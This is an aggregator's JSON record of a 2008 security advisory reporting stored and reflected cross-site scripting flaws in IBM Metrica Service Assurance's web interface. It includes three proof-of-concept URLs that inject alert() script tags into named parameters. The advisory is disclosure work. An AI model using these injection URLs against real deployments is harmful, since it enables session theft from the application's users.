{"lastseen": "2016-11-03T10:20:02", "references": [], "description": "", "reporter": "Francesco Bianchino", "published": "2008-11-09T00:00:00", "type": "packetstorm", "title": "metrica-xss.txt", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:20:02", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:02", "rev": 2}, "vulnersScore": -0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-11-09T00:00:00", "id": "PACKETSTORM:71738", "href": "https://packetstormsecurity.com/files/71738/metrica-xss.txt.html", "viewCount": 2, "sourceData": "`Metrica Service Assurance Multiple Cross Site Scripting \n \n*********************************************************************** \n \nAuthor: Francesco Bianchino \n \nEmail: f.bianchino@gmail.com \n \nTitle: Metrica Service Assurance Multiple Cross Site Scripting \n \nVendor: IBM \n \n*********************************************************************** \n \nSummary \n \nMetrica Service Assurance Framework implements a distributed, \nobject-oriented, J2EE-based architecture. It work with a Web-based \nuser interfaces, from end-user report generation to detailed system \nadministration and configuration. \n \n*********************************************************************** \n \nVulnerability Detail \n \nThe web-based interface of Metrica Service Assurance is exposed to \nmultiple XSS attack. With an authenticated user it's possible to steal \nother user's sessions due to a flaw in the input validation \nmechanisms. \nA persistant XSS permits the insertion of malicious code into the \nweb-based interface. Using the report generation function it is \npossible to create a report with malicious code in the name. \nThat code is than rendered on the victim's browser when opening the \nreport history which can be found in the main panel of the \napplication. \nThe code also persists into the main panel and all the users are \nexposed to the attack. \n \nThere are at least three vulnerable pages: \n \nNon persistant: \n* http://server/<document root>/ReportTree \n* http://server/<document root>/Launch \n \nPersistant: \n* http://server/<document root>/ReportRequest \n \n*********************************************************************** \n \nExploit \n \nhttp://server/<document \nroot>/ReportTree?action=generatedreportresults&elementid=\"><SCRIPT>alert(\"Non \npersistant XSS\");</SCRIPT><!--&date=0000000000000 \n \nhttp://server/<document root>/Launch?jnlpname==\"><SCRIPT>alert(\"Non \nPersistant XSS\");</SCRIPT> \n \nhttp://server/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod=none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant \nXSS!);</SCRIPT>&none_agg_specified=false&windowtype=main \n \n*********************************************************************** \n \nSolution \n \nAt the moment of writing this advisory the is no solution yet. \n \n*********************************************************************** \n \nCredits \n \nDiscovered and advised to IBM, November 2008 by Francesco Bianchino. \nThanks to Marco borza and to da EthicalHAkinTeam \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/71738/metrica-xss.txt"}

{}